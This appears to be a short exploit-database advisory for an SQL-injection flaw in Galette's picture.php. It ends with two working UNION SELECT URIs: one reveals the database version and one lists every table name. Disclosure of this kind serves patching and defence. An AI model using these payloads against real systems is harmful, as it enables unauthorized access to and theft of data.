ID: 1337DAY-ID-18261
Type: zdt
Reporter: Sofian Brabez
Modified: 2012-05-13T00:00:00
Description
Exploit for php platform in category web applications
Source: http://www.securityfocus.com/bid/53463/info
Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Galette 0.7.x are vulnerable.
Attackers can use a browser to exploit this issue.
The following example URIs are available.
http://server/picture.php?id_adh=0+and+1=0+union+select+@@version,null
http://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables